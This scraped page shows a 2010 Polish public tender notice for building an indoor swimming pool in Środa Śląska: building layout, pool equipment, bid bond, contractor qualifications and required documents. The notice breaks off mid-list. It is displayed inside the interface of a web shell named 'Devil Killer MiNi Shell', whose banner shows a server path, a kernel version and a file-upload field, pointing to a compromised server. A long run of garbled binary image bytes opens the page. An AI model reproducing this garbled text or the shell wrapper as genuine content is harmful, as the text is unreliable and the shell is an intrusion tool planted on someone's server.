JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100622/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100622/176760-N-2010.html

<p class="kh_header"><b>Środa Śląska: Rozwój Turystyki  Aktywnej - Budowa basenu w Środzie Śląskiej</b><br>
<b>Numer ogłoszenia: 176760 - 2010; data zamieszczenia: 22.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina i Miasto Środa Śląska , Plac Wolności 5, 55-300 Środa Śląska, woj. dolnośląskie, tel. 71 3960724, faks 71 3173405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.srodaslaska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozwój Turystyki  Aktywnej - Budowa basenu w Środzie Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia publicznego jest budowa krytej pływalni w Środzie Śląskiej wraz z infrastruktura techniczną. Inwestycja zlokalizowana jest Środa Śląska , ul. Kilińskiego dz. nr 1/9 a.m.  28  
Ogólna charakterystyka budynku:
Dane powierzchniowe
parter  :     1817, 6   m2
piętro   :      412, 8   m2        
piwnica :    1310,3   m2
Razem       3 540,7  m2
Kubatura   12 950     m3
Budynek  Basenu  jest obiektem trzykondygnacyjnym.
Hall wejściowy obejmuje faktycznie dwa poziomy  budynku połączone szerokimi schodami   i otwartą dwukondygnacyjną  przestrzenią .  
Niższa  część hallu (  poziom  - 3,40 =  122,6 mnpm ) jest związana  z wejściem głównym , z  funkcjami  fitness i  pomocniczymi ( szatnie , toalety ) . Na wyższym poziomie  ( + 0,00 = 126,0 mnpm ) znajdują się wszystkie podstawowe funkcje basenu oraz zespół  pomieszczeń medycznych. . Nad wejściem głównym umieszczono antresolę  kawiarni - przeszkloną zarówno  w fasadzie zewnętrznej jak i  od strony hallu . 
Na wprost  wejścia głównego  w niższej części hallu  (- 3,40 )  zlokalizowano wejście do zespołu fitness . 
Należy do niego zespół saun i siłownia. 
Sauny są zlokalizowane  przy zespole szatniowym .  
Zespół  fitness posiada dodatkowe połączenie schodami z przestrzenią hali basenu . Pozostałą część  poziomu  -3,40  basenu zajmują pomieszczenia techniczne i pomocnicze.
Hall główny na poziomie wyższym ( + 0,00 ) posiada przeszklenie pozwalające na wgląd  do hali basenowej . Z  przestrzeni hallu  jest dostępna  kawiarnia ,  zespół pomieszczeń medycznych i przejście przez  zespół kasowy do szatni  basenowych . Na widownię zlokalizowaną na wyższej kondygnacji 
( + 3,63 )  prowadzą z  tej części obiektu łatwo dostępne schody .

Zespół szatni składa się z  szatni męskiej ,  damskiej  oraz szatni dla osób niepełnosprawnych połączonych( łącznie  szafek podwójnych :  51 + 51 + 6)  z toaletami i zespołem natrysków.   Poza wyżej opisanymi pomieszczeniami zaprojektowano szatnie dla uczniów  które składają się z dwóch osobnych szatni ( łącznie szafek pojedynczych : 14 +14 oraz szafek podwójnych : 9 + 9 )

Hala basenu wyposażona została  w  następujące niecki ze stali nierdzewnej  :                 
-dużą nieckę basenową sportową o wym.12,50 x 25,00 m i głębokości od 140 do 180cm; wyposażoną w   
oświetlenie  podwodne,  4 drabinki w niszy ze stopniami antypoślizgowymi, 6 słupków startowych, oznakowanie dna i  ścian  szczytowych wg FINA, haki kotwiące liny torowe 10 szt, przepusty dla wlotów i wylotów   systemu cyrkulacyjnego, gniazda dla słupów linii nawrotowych, gniazda dla linii falstartowej, linie  nawrotne i podstawowe, ściany nawrotu, przepusty dla odkurzacza itd. Opcjonalnie przewiduje się możliwość zainstalowania wypłycenia na dwóch torach basenu - w postaci demontowalnego  ażurowego podestu z barierką oddzielająca od pozostałej części basenu . 
- małą nieckę basenową  rekreacyjną o głębokości max 120cm,  
 wyposażoną w  schody zejściowe , ławki rurkowe z masażem  powietrznym ,  gejzer powietrzny , masaż ścienny , masaż karku szeroki i wąski , grotę sztucznej fali,  zjeżdżalnię małą , drabinki w niszy , przepusty dla odkurzacza, przepusty dla wlotów i   wylotów systemu  cyrkulacyjnego, przystawiany zjazd dla osób niepełnosprawnych ,  przepusty dla odkurzacza, przepusty dla wlotów i wylotów systemu  cyrkulacyjnego i oświetlenie podwodne.
- brodzik dla dzieci  dwuczęściowy  głębokości 25 cm. z  małym wodotryskiem .   
  Projekty wykonawcze niecek, ich   posadowienia i wyposażenia wykona dostawca i producent niecek. Projekt wykonawczy basenów  stalowych musi zostać wykonany zgodnie z  przepisami FINA 2003-2005 i być uzgodniony z PZP
Ponadto na hali basenowej  zaprojektowano :
- rynnę zjeżdżalni dł. ok. 47 m  łącznie  z basenem hamownym i podestem startowym;
- 1 basen  jaccusi   o wymiarach ok  2,25 m/2,25 m.  
Z hali basenu dostępne są również 2 magazyny  sprzętu podręcznego, sanitariat dla matki z dzieckiem oraz pomieszczenie  ratownika.
Z korytarza  na piętrze zaprojektowano wejścia do pomieszczeń biurowych administracji obiektu oraz wejście na widownię przy sportowej niecce basenowej . Zaprojektowano widownię  posiadającą  ok. 165  miejsc siedzących. 
W piwnicach  zlokalizowano pomieszczenia techniczne i socjalne dla pracowników .
Poprzez niezależne  wejście z obniżonego dojazdu ( poziom. 122,58 m.n.p.m. ) zaprojektowano wejście pracownicze, gospodarcze i techniczne. W części pracowniczej zaprojektowano  2 szatnie z węzłami sanitarnymi i pomieszczenie socjalne.  W części technicznej zaprojektowano: pomieszczenie kotłowni , dyżurkę techników z węzłem sanitarnym, warsztat podręczny oraz pomieszczenia stacji uzdatniania wody - magazyny podchlorynu sodu, regulatora kwasowości i koagulanta.
   W przestrzeni podbasenia  przewidziano lokalizację filtrów i zbiorników      	wyrównawczych. Oprócz głównej klatki schodowej przy hollu głównym , zaprojektowano 	klatkę schodową      łączącą  widownię i pozostałe  kondygnacje, klatka służy również jako 	droga ewakuacyjna. 
1.Podstawowe rozwiązania konstrukcyjno - materiałowe
 Konstrukcja budynku : fundamenty żelbetowe, słupy żelbetowe, ściany murowane - pustaki ceramiczne  szczelinowe , stropy  gęstostożebrowe i żelbetowe , dachy  skośne : konstrukcja  dźwigarów  i  płatwi  z drewna klejonego , ocieplenie wełną mineralną układaną na płytach gipsowo - kartonowych  .  Zewnętrzne  pokrycie  dachów  - blacha tytanowo - cynkowa na płytach OSB  . Dachy płaskie  :  kryte  papą termozgrzewalną .
2. Instalacje wewnętrzne wodno - kanalizacyjna ,grzewcza co z kotłownią  gazową, gazowa wewnętrzna, wentylacja mechaniczna z odzyskiem ciepła, elektryczna  wysokoprądowa  i niskoprądowa : monitoring zewnętrzny , antywłamaniowa SSW , zintegrowana telefoniczna i komputerowa, odgromowa  i oświetlenia zewnętrznego 
W zakres umowy wejdzie rozruch technologiczny oraz szkolenie  przeszłego personelu.
Fakturowanie:
2010 r.  - ok. 1.500.000zł
2011 r. - ok. 10.000.000 zł
2012 r. - pozostała kwota.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.21.22.12-5, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający będzie żądał  wniesienia wadium od wykonawców zaproszonych do składania ofert w wysokości 180.000PLN.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu  mogą brać  udział wykonawcy, którzy spełniają  następujące warunki :
- posiadają  niezbędna  wiedzę i doświadczenie  i w tym względzie wykażą  i udokumentują , że  w okresie ostatnich pięciu lat  przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonali  co najmniej  jedna robotę budowlaną  polegająca  na wybudowaniu obiektu budowlanego krytej pływalni  o łącznej wartości robót budowlanych nie mniejszej niż  15.000.000 PLN brutto o powierzchni lustra  wody min 400 m2 (powierzchnia lustra wody niecki sportowej i ewentualnie niecki rekreacyjnej w krytej pływalni) 
Dla przeliczenia  na PLN danych finansowych  wyrażonych w  walutach innych niż  PLN należ  przyjąć  średni kurs danej waluty publikowany przez Narodowy Bank Polski z dnia,  w którym ukazało się ogłoszenie o zamówieniu w Biuletynie Zamówień Publicznych .
Wymagane dokumenty:
- wykaz  robót budowlanych  w zakresie niezbędnym do wykazania spełnienia warunku  wiedzy i doświadczenia, wykonanych  w okresie ostatnich  pięciu lat  przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, z podaniem  ich rodzaju  i wartości, daty i miejsca wykonania  - sporządzonego  wg  załącznika nr 3 - DOŚWIADCZENIE ZAWODOWE . 
Do wykazu  należy dołączyć dokumenty potwierdzające, że  roboty zostały  wykonane zgodnie  z zasadami  sztuki budowlanej i prawidłowo ukończone. 
Znaczenie  warunku -  100 %.
Ocena posiadania niezbędnej wiedzy  i doświadczenia.
Ocenie podlegać będzie ilość  robót budowlanych odpowiadających stanowiącym  swoim rodzajem robotom  budowlanym  stanowiącym przedmiot zamówienia w okresie ostaniach pięciu lat  przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonali  co najmniej  jedna robotę budowlaną  polegająca  na wybudowaniu obiektu budowlanego krytej pływalni  o łącznej wartości robót budowlanych nie mniejszej niż  15.000.000 PLN brutto o powierzchni lustra  wody min 400 m2 (powierzchnia lustra wody niecki sportowej i ewentualnie niecki rekreacyjnej w krytej pływalni) 
Sposób oceny spełniania warunku:
Warunek będzie oceniany w skali  0 - 100 pkt.
Wykonawca, który wykaże  się największą ilością  wykonywanych robót budowlanych odpowiadających  przedmiotowi zamówienia, otrzyma  100 pkt. . Pozostali wykonawcy będą oceniani odpowiednio proporcjonalnie mniej w skali 0 - 100 pkt. Do składnia  ofert  zostanie zaproszonych  5 wykonawców.
Lista wykonawców zaproszonych będzie ustalona wg następujących zasad:
a) lista wykonawców będzie tworzona  na podstawie  ilości punktów uzyskanych  za ocenę tego warunku 
b) w przypadku uzyskania przez wykonawców  równej ilości punktów, o kolejności wykonawców  zadecyduje najwyższa łączną wartość  brutto  robót wymienionych w wykazie  (załącznik  nr 2 - DOŚWIADCZENIE ZAWODOWE ), spełniających  wymagania zamawiającego  (wybudowane  kryte  pływalnie spełniające  wymogi zamawiającego)
Jeżeli liczba  wykonawców, którzy spełniają  warunki udziału w postępowaniu jest  mniejsza niż  5, zamawiający zaprosi do składania ofert wszystkich wykonawców spełniających te warunki</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu  mogą brać  udział wykonawcy, którzy spełniają  następujące warunki :
- dysponują  osobami  zdolnymi do wykonania zamówienia i przedstawią  informację o podstawie do dysponowania tymi osobami ( w przypadku  gdy wykonawca polegać  będzie na osobach zdolnych  do wykonania  zamówienia, niezależnie od charakteru prawnego łączących go z nim stosunków,  w takiej sytuacji zobowiązany  jest udowodnić  zamawiającemu, że  będzie dysponował zasobami  niezbędnymi  do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy  wykonywaniu zamówienia).
Wykonawca spełnia warunek  jeżeli dysponuje lub będzie dysponował osobami  zdolnymi do wykonania niniejszego zamówienia, spełniając co najmniej następujące warunki: 
1. Kierownik budowy  posiadający:
prawo wykonywania samodzielnej funkcji technicznej  w budownictwie do kierowania robotami  budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń   (zgodnie z Rozporządzeniem  Ministra transportu i Budownictwa z dnia  28 kwietnia 2006r. w sprawie  samodzielnych  funkcji technicznych w  budownictwie [Dz. U. Nr 83, poz. 578]  i/lub  odpowiadające im ważne  uprawnienia budowlane  w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących  przepisów),
aktualny wpis do właściwej Izby Samorządu Zawodowego
doświadczenie zawodowe w kierowaniu co najmniej jedna robotą  budowlaną  polegającą  na budowie obiektu budowlanego, krytej pływalni o wartości robót  minimum 15.000.000 PLN brutto
staż  minimum 3lat od chwili uzyskania uprawnień. 
2. Kierownik robót sanitarnych , posiadający: 
prawo wykonywania samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń (zgodnie z Rozporządzeniem  Ministra transportu i Budownictwa z dnia  28 kwietnia 2006r. w sprawie  samodzielnych  funkcji technicznych w  budownictwie [Dz. U. Nr 83, poz. 578]  i/lub odpowiadające im ważne  uprawnienia budowlane  w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących  przepisów),
aktualny wpis do właściwej Izby Samorządu Zawodowego
doświadczenie zawodowe w kierowaniu co najmniej jedna robotą  budowlaną  polegającą  na budowie obiektu budowlanego, krytej pływalni o wartości robót  minimum 15.000.000 PLN brutto
staż  minimum 3 lat od chwili uzyskania uprawnień. 
3. Kierownik  robót elektrycznych , posiadający:
      -      prawo  wykonywania samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń   (zgodnie z Rozporządzeniem  Ministra transportu i Budownictwa z dnia  28 kwietnia 2006r. w sprawie samodzielnych  funkcji technicznych w  budownictwie [Dz. U. Nr 83, poz. 578]  i/lub  odpowiadające im ważne uprawnienia budowlane  w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
aktualny wpis do właściwej Izby Samorządu Zawodowego
staż  minimum 3lat od chwili uzyskania uprawnień. 

4. Kierownik robót drogowych posiadający:
prawo  wykonywania samodzielnej funkcji technicznej w budownictwie do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń   (zgodnie z Rozporządzeniem  Ministra transportu i Budownictwa z dnia  28 kwietnia 2006r. w sprawie samodzielnych  funkcji technicznych w  budownictwie [Dz. U. Nr 83, poz. 578]  i/lub odpowiadające im ważne uprawnienia budowlane  w zakresie pełnionej funkcji, które zostały wydane na podstawie wcześniej obowiązujących przepisów),
aktualny wpis do właściwej Izby Samorządu Zawodowego
staż  minimum 3lat od chwili uzyskania uprawnień. 
W przypadku składania oferty wspólnej w/w warunki uznaje się za  spełnione, jeżeli spełniają je łącznie wszyscy wykonawcy  składający ofertę  wspólną.
Dokumenty  potwierdzające spełnienie tych  warunków mogą dotyczyć i zostać złożone przez jednego wykonawcę lub wszystkich wykonawców składających ofertę wspólną. 
Znaczenie warunku - bez znaczenia punktowego.
Sposób  oceny spełnienia warunku - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu  mogą brać  udział wykonawcy, którzy spełniają  następujące warunki :
znajdują się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie zamówienia w tym względzie:
posiadają  środki finansowe lub zdolność  kredytową w wysokości nie mniejszej niż 7.000.000 PLN (wymagane dokumenty- informacja  banku lub  oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca  wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż  3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału  w postępowaniu  o udzielenie zamówienia)
posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę  10.000.000 PLN ( wymagane dokumenty: opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności zawiązanej z przedmiotem zamówienia) 
Dla przeliczenia  na PLN danych finansowych  wyrażonych w  walutach innych niż  PLN należ  przyjąć  średni kurs danej waluty publikowany przez Narodowy Bank Polski z dnia,  w którym ukazało się ogłoszenie o zamówieniu w Biuletynie Zamówień Publicznych .
W przypadku składania oferty wspólnej w/w warunki uznaje się za  spełnione, jeżeli spełniają je łącznie wszyscy wykonawcy  składający ofertę  wspólną.
Dokumenty  potwierdzające spełnienie tych  warunków mogą dotyczyć i zostać złożone przez jednego wykonawcę lub wszystkich wykonawców składających ofertę wspólną. 
Znaczenie warunku - bez znaczenia punktowego.
Sposób  oceny spełnienia warunku - spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

